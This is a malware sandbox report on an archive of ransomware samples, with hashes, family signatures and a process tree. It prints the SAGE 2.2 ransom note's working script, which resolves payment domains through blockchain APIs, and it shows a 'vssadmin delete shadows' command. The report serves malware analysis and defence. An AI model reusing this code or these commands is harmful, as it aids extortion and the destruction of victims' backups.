Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

RNSM00299.7z

windows7-x64

10

Resubmissions

15/11/2024, 10:24

241115-mfgmrssjhv 1

14/11/2024, 23:24

241114-3d24paverc 1

14/11/2024, 21:31

241114-1djagatdmk 10

Analysis

  • max time kernel
    187s
  • max time network
    248s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14/11/2024, 21:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00299.7z

  • Size

    19.4MB

  • MD5

    e74e2b3e44e8e753302f21ad25e1b8fc

  • SHA1

    7725facdbb3b12c3e888a2f0fedebe62afd3fcb6

  • SHA256

    651e6a8e42d16855e1579c95159a2102aae5a19da17bbed94c2534d5272253cb

  • SHA512

    f0142a2247307ed4ef5814732ae6371f6ce31d013644d99eb8455ac7837d7037792e225d5b93cf34449e7288aa3ee476e529b5849c45fe85bbe8a2f9f8f1eb20

  • SSDEEP

    393216:fBTrkg54OPuzE3EpnP5qUVp2g4B4AX3gk6PulqnxCKO1:dJuzXpnPvS9D3g3Puwr0

Score
10/10
cerberdarkcometdharmagozilockywannacryagilenetbankercredential_accessdefense_evasiondiscoveryevasionexecutionimpactpersistenceprivilege_escalationransomwareratspywarestealertrojanupxworm

Malware Config

Extracted

Path

C:\Users\Admin\Music\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AXG4h6e3qtZoGcCr5cg-1yzrbvS0zmVVNWJahdO1DyRa60FxRQq3fyLA" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-ar' > الملف الذي كنت بصدد فتحه وبعض الملفات المهمة على حاسوبك تم تشفيرها "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که شما تلاش کردید بازکنید و فایل های کامپیوتر شما رمزگذاری شده است "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2> <h2 class='l l-en' style='display:block'>Action required to restore your files.</h2><h2 class='l l-de' >Aktion erforderlich, um ihre Daten wiederherzustellen.</h2><h2 class='l l-it' >Azione necessaria per ripristinare i file.</h2><h2 class='l l-pt' >O que você deve fazer para restaurar seus arquivos.</h2><h2 class='l l-es' >Se requiere una acción para restaurar sus archivos.</h2><h2 class='l l-fr' >Action requise pour restaurer vos fichiers.</h2><h2 class='l l-kr' >파일을 복원하는 데 필요한 작업.</h2><h2 class='l l-nl' >Aktie vereist om je bestanden te herstellen.</h2><h2 class='l l-ar' > الإجراءات المطلوبة لاستعادة الملفات الخاصة بك.</h2><h2 class='l l-fa' >برای بازگرداندن فایل های خود را اقدام کنید.</h2><h2 class='l l-zh' >要恢复文件需要进行解密。</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnk
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Signatures

  • Cerber 2 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

    ransomwarecerber
  • Cerber family
    cerber
  • Darkcomet

    DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.

    trojanratdarkcomet
  • Darkcomet family
    darkcomet
  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

    ransomwaredharma
  • Dharma family
    dharma
  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Gozi family
    gozi
  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

    ransomwarelocky
  • Locky family
    locky
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Wannacry family
    wannacry
  • Contacts a large (8812) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (320) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (5635) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Blocklisted process makes network request 6 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Drops startup file 6 IoCs
  • Executes dropped EXE 51 IoCs
  • Loads dropped DLL 38 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 11 IoCs
    persistence
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 40 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 12 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 5 IoCs
    installer
  • Interacts with shadow copies 3 TTPs 7 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies Control Panel 15 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 56 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 47 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 32 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: RenamesItself 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1096
    • C:\Windows\System32\vssadmin.exe
      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Interacts with shadow copies
      PID:3412
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1172
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Enumerates connected drives
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:1208
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00299.7z"
      2⤵
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2336
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1460
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2296
      • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Blocker.gen-23cdff4548bab414f55106bc84fc8cccf7ffba77872853d59654ed2c8dc20d7e.exe
        HEUR-Trojan-Ransom.Win32.Blocker.gen-23cdff4548bab414f55106bc84fc8cccf7ffba77872853d59654ed2c8dc20d7e.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:2540
      • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Generic-0bd80f512dd5886986209806d0dee62457bafa92b0147c34ccb39357bef7d06c.exe
        HEUR-Trojan-Ransom.Win32.Generic-0bd80f512dd5886986209806d0dee62457bafa92b0147c34ccb39357bef7d06c.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2860
      • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Generic-178a21b4243d7266fb7fb45e72d682c4f7cdc134e7118d96e68698c90108b6a3.exe
        HEUR-Trojan-Ransom.Win32.Generic-178a21b4243d7266fb7fb45e72d682c4f7cdc134e7118d96e68698c90108b6a3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        PID:1808
      • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Generic-9ddd53f28685ad79e6b187b8f23d42b314598a3fbeda2c47a3533cec89ab6d0b.exe
        HEUR-Trojan-Ransom.Win32.Generic-9ddd53f28685ad79e6b187b8f23d42b314598a3fbeda2c47a3533cec89ab6d0b.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1148
        • C:\Users\Admin\Desktop\00299\scan.exe
          "C:\Users\Admin\Desktop\00299\scan.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2244
          • C:\Users\Admin\Desktop\00299\scan.exe
            "C:\Users\Admin\Desktop\00299\scan.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3764
            • C:\Users\Admin\AppData\Roaming\Osunom\tiux.exe
              "C:\Users\Admin\AppData\Roaming\Osunom\tiux.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:3844
              • C:\Users\Admin\AppData\Roaming\Osunom\tiux.exe
                "C:\Users\Admin\AppData\Roaming\Osunom\tiux.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:3912
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_c2b44f79.bat"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3796
      • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Generic-9ffdf855d818abfad2865e0600b369c9e2e0e6a9900fddcc86adb2d458d2e54f.exe
        HEUR-Trojan-Ransom.Win32.Generic-9ffdf855d818abfad2865e0600b369c9e2e0e6a9900fddcc86adb2d458d2e54f.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1508
        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          C:\Users\Admin\AppData\Local\Temp\svchost.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3748
        • C:\Windows\system32\cmd.exe
          cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysB00D.tmp"
          4⤵
            PID:3852
        • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Locky.vho-5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add.exe
          HEUR-Trojan-Ransom.Win32.Locky.vho-5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add.exe
          3⤵
          • Executes dropped EXE
          • Sets desktop wallpaper using registry
          • System Location Discovery: System Language Discovery
          • Modifies Control Panel
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1824
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys7C9F.tmp"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4172
        • C:\Users\Admin\Desktop\00299\Trojan-Ransom.NSIS.Locky.j-6a718cd88acf07f2cca550a4ffe5f14ddb6d6ef17d183fb1a2a1e251a1b73188.exe
          Trojan-Ransom.NSIS.Locky.j-6a718cd88acf07f2cca550a4ffe5f14ddb6d6ef17d183fb1a2a1e251a1b73188.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1528
          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.NSIS.Locky.j-6a718cd88acf07f2cca550a4ffe5f14ddb6d6ef17d183fb1a2a1e251a1b73188.exe
            Trojan-Ransom.NSIS.Locky.j-6a718cd88acf07f2cca550a4ffe5f14ddb6d6ef17d183fb1a2a1e251a1b73188.exe
            4⤵
            • Executes dropped EXE
            PID:3196
